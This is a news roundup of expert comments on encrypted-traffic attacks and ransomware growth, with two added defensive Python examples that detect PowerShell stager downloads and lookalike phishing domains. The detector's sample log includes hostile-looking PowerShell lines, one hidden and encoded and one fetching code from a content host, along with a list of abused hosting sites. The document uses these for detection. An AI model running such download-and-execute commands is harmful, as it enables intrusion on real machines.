New research by Zscaler, analyzing 6.6 billion security threats, found a 260% increase in attacks during the first nine months of 2020. Among the encrypted attacks, ransomware rose by 500%, with the most prominent variants being FileCrypt/FileCoder, followed by Sodinokibi, Maze and Ryuk.
Here’s what security experts had to say about these findings:
Oleg Kolesnikov, VP of Threat Research at Securonix:
“Having more visibility into the SSL/TLS traffic definitely is one of the key elements needed to detect modern attacks. However, SSL/TLS inspection/termination alone is often not sufficient. To illustrate, even with SSL/TLS inspection in place, malicious threat actors (MTA) often implement additional layers of encryption and obfuscation on top of SSL/TLS and are also often leveraging legitimate sites, such as githubusercontent, cloud drives, and others, to “reflect”/host malicious stager payloads.
One example is Trickbot/Powertrick MTA, where we’ve been seeing attackers download post-attack PowerShell stagers from SSL/TLS sites. For this reason, in addition to SSL/TLS inspection and termination, it’s important to be able to monitor SSL/TLS activity in the context of some of the other activity that happens in your environment from a variety of log/data sources and be able to correlate behaviours across different log/data sources effectively, especially when it comes to cloud collaboration apps.”
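The correlation Kolesnikov describes, as an added example that is not part of the article or of any Securonix product: a TLS proxy log (which records only the server name, not decrypted content) is joined against an endpoint process-creation log, and a connection to a legitimate content-hosting site is flagged when it follows a PowerShell launch on the same host within a short window. Both log formats, the sample lines, the list of commonly abused content hosts and the 30-second window are constructed assumptions a defender would tune to their own environment.

```python
"""Correlate TLS proxy events with endpoint process events.

Added example (not from the article or any vendor product). The log
formats and sample lines below are constructed; the content-host list,
the PowerShell heuristic and the time window are assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample: TLS proxy log, one connection per line.
# Fields: timestamp, source host, server name (SNI), bytes received.
PROXY_LOG = """\
2020-10-05T09:14:02Z ws-042 raw.githubusercontent.com 48211
2020-10-05T09:14:05Z ws-017 updates.example-vendor.com 918233
2020-10-05T09:20:31Z ws-042 login.microsoftonline.com 3321
2020-10-05T09:22:10Z ws-101 cdn.discordapp.com 61220
"""

# Constructed sample: endpoint process-creation log.
# Fields: timestamp, host, process image, command line (rest of line).
PROCESS_LOG = """\
2020-10-05T09:13:58Z ws-042 powershell.exe powershell -nop -w hidden -enc <encoded-placeholder>
2020-10-05T09:14:03Z ws-017 msiexec.exe msiexec /i vendor-update.msi /qn
2020-10-05T09:22:04Z ws-101 powershell.exe powershell -ep bypass -c "iwr https://cdn.discordapp.com/<path>"
2020-10-05T09:30:00Z ws-042 outlook.exe outlook.exe
"""

# Legitimate sites commonly abused to host stager payloads (assumption:
# a defender maintains this from their own threat intelligence).
CONTENT_HOSTS = {
    "raw.githubusercontent.com",
    "cdn.discordapp.com",
    "pastebin.com",
}

# Assumed window: process launch must precede the TLS connection by at most this.
WINDOW = timedelta(seconds=30)


@dataclass
class ProxyEvent:
    ts: datetime
    host: str
    sni: str
    bytes_in: int


@dataclass
class ProcessEvent:
    ts: datetime
    host: str
    image: str
    cmdline: str


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def parse_proxy_log(text: str) -> list:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, sni, nbytes = line.split()
        events.append(ProxyEvent(parse_ts(ts), host, sni.lower(), int(nbytes)))
    return events


def parse_process_log(text: str) -> list:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, image, cmdline = line.split(maxsplit=3)
        events.append(ProcessEvent(parse_ts(ts), host, image.lower(), cmdline))
    return events


def correlate(proxy_events, process_events, window=WINDOW) -> list:
    """Flag TLS connections to content-hosting sites that follow a
    PowerShell launch on the same host within `window`."""
    alerts = []
    for px in proxy_events:
        if px.sni not in CONTENT_HOSTS:
            continue
        for pr in process_events:
            if pr.host != px.host or pr.image != "powershell.exe":
                continue
            delta = px.ts - pr.ts
            if timedelta(0) <= delta <= window:
                alerts.append({
                    "host": px.host,
                    "sni": px.sni,
                    "seconds_after_launch": int(delta.total_seconds()),
                    "cmdline": pr.cmdline,
                })
    return alerts


def run() -> list:
    return correlate(parse_proxy_log(PROXY_LOG), parse_process_log(PROCESS_LOG))


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

Neither log needs decrypted payloads: the proxy contributes only the server name and byte count, and the endpoint contributes the process lineage, which is exactly the cross-source context the quote argues inspection alone lacks. The vendor-update download on ws-017 (msiexec, not a content host) is correctly left alone.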
Richard Bejtlich, principal security strategist at Corelight:
“Better visibility is helpful, but it must be balanced against legal, technical, and ethical considerations. Because there are organizations that cannot or choose not to break and inspect encrypted traffic, it is important that organizations continue to heavily invest in research and deploy innovative analytical approaches to provide visibility while preserving encryption.”
Niamh Muldoon, senior director of trust and security at OneLogin:
“I agree that using security controls such as SSL certs to secure communications and links could support masking the threat and attack vector, and this is why in-depth control frameworks are so important; other security controls and alerts would highlight this as malicious activity for investigation. An identity and access management platform that assesses risk control from both an authentication and authorization perspective would support identifying these malicious attack attempts, as risk factors would change and reduce the associated risks.
For any cybersecurity team to be successful they must have security monitoring, alerting technologies and tooling throughout their organisation’s architecture so they can identify a threat and respond accordingly to reduce business impacts and consequences, up to and including preventing a data breach. In a cybersecurity protection role this too can include the ability to monitor encrypted communication channels.
There are no privacy implications here; the definition of privacy is the permitted access to data to carry out the business requirements, and in this case access is granted to review communication channels and identify the cybersecurity threat contained within the encrypted channel. That being said, if the security team have been involved in the design and architecture of the network/communication channels using encryption, they will be implemented in a way that they can identify authentication communications to unauthorized users, along with the ability to monitor a specific communication should they need to.”
Jamie Akhtar, co-founder and CEO at CyberSmart:
“For most organisations, particularly SMEs with little to no resources or knowledge dedicated to cybersecurity, determining the safety of a site comes down to whether or not it has a padlock symbol in the search bar. Unfortunately, while tools such as this are primarily employed to ensure privacy and data integrity, they can also be manipulated for nefarious uses. Indeed, it’s a clever trick, as malicious acts are masked behind a symbol universally recognised to mean ‘secure’ and ‘safe’. Organisations would benefit from deploying security defences that analyse the legitimacy of connections.”
Stephen Banda, senior manager of security solutions at Lookout:
“The use of SSL certificate phishing attacks is an effective method to trick the end user into clicking the link since most users view the https prefix and padlock symbol as a sign of security.
First developed in 1994, the SSL certificate has long been regarded as the gold standard for digitally certifying the identity of a website and encrypting website traffic. This encryption, when used for legitimate websites, helps protect against man-in-the-middle attacks, spoofed websites, and eavesdroppers so that your information remains secure. Unfortunately, without a central authority governing the creation of https sites, hackers have been registering and spinning up https-enabled phishing sites at a rapid pace.
Lookout identifies mobile phishing attacks without inspecting message content so that user privacy is respected. Lookout processes a minimum of 15 million TLS certificate events and 150,000 new domain registrations daily, resulting in 15,000 phishing domains each month.
Sophisticated cybersecurity solutions should be able to detect SSL certs in phishing attacks without inspecting message content. This is especially important as employees increasingly use their personal tablets, smartphones, and chromebooks for work. They do not want their employer inspecting their web content and demand privacy.”
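Banda's point is that phishing domains can be spotted from certificate issuance and domain registration events alone, with no message or page content ever read. The following is an added illustration of that idea, not Lookout's code or the article's: it scores newly issued certificates by whether the registrable domain is a homoglyph of, or embeds, a watched brand, whether the label carries typical lure words, and whether the domain was registered recently. The certificate events, registration dates, brand watch-list, lure words, scoring weights and the 30-day cutoff are all constructed assumptions.

```python
"""Triage TLS certificate issuance events for lookalike phishing domains
without inspecting any page or message content.

Added example (not the article's or Lookout's code). The events, the
registration dates and the brand watch-list are constructed; the scoring
weights and the 30-day "newly registered" cutoff are assumptions.
"""
from datetime import date

# Constructed sample: certificate issuance events.
# Fields: timestamp, subject name, issuer (rest of line).
CERT_EVENTS = """\
2020-10-06T02:11:09Z paypa1-secure-login.com Example Free CA
2020-10-06T02:15:44Z www.paypal.com Example Commercial CA
2020-10-06T03:01:12Z micros0ft-account-verify.net Example Free CA
2020-10-06T03:40:58Z blog.example.org Example Free CA
2020-10-06T04:05:00Z rnicrosoft.com Example Free CA
"""

# Constructed WHOIS-style creation dates for the registrable domains above.
REGISTRATION_DATES = {
    "paypa1-secure-login.com": "2020-10-05",
    "micros0ft-account-verify.net": "2020-10-04",
    "blog.example.org": "2015-03-12",
    "rnicrosoft.com": "2020-09-30",
}

# Assumed watch-list: brand label -> that brand's legitimate registrable domains.
BRANDS = {"paypal": {"paypal.com"}, "microsoft": {"microsoft.com"}}
LURE_WORDS = {"login", "secure", "verify", "account", "update"}
NEW_DOMAIN_DAYS = 30       # assumption
ALERT_THRESHOLD = 3        # assumption

# Common character substitutions used to imitate a brand label.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(label: str) -> str:
    for src, dst in HOMOGLYPHS:
        label = label.replace(src, dst)
    return label


def registrable_domain(fqdn: str) -> str:
    # Naive public-suffix handling: last two labels (adequate for .com/.net/.org).
    return ".".join(fqdn.lower().rstrip(".").split(".")[-2:])


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def score_domain(fqdn: str, today: date):
    """Return (score, reasons) using only the name and its registration age."""
    reg = registrable_domain(fqdn)
    if any(reg in legit for legit in BRANDS.values()):
        return 0, ["legitimate brand domain"]
    norm = normalize(reg.split(".")[0])
    score, reasons = 0, []
    for brand in BRANDS:
        if norm == brand:
            score += 3
            reasons.append(f"homoglyph of {brand}")
        elif brand in norm:
            score += 2
            reasons.append(f"embeds {brand}")
        elif levenshtein(norm, brand) <= 2:
            score += 2
            reasons.append(f"near {brand}")
    if LURE_WORDS & set(norm.split("-")):
        score += 1
        reasons.append("lure words")
    created = REGISTRATION_DATES.get(reg)
    if created and (today - date.fromisoformat(created)).days <= NEW_DOMAIN_DAYS:
        score += 2
        reasons.append("newly registered")
    return score, reasons


def triage(events_text: str, today: date) -> list:
    flagged = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        _ts, fqdn, issuer = line.split(maxsplit=2)
        score, reasons = score_domain(fqdn, today)
        if score >= ALERT_THRESHOLD:
            flagged.append({"domain": fqdn, "score": score, "reasons": reasons, "issuer": issuer})
    return sorted(flagged, key=lambda f: -f["score"])


if __name__ == "__main__":
    for hit in triage(CERT_EVENTS, date(2020, 10, 6)):
        print(hit)
```

The only inputs are public metadata (the certificate subject name, issuer and a registration date), which is why this kind of check can run on personal devices without reading the user's traffic. The brand's own domain is allowlisted before any similarity scoring so that `www.paypal.com` is never mistaken for a lookalike of itself.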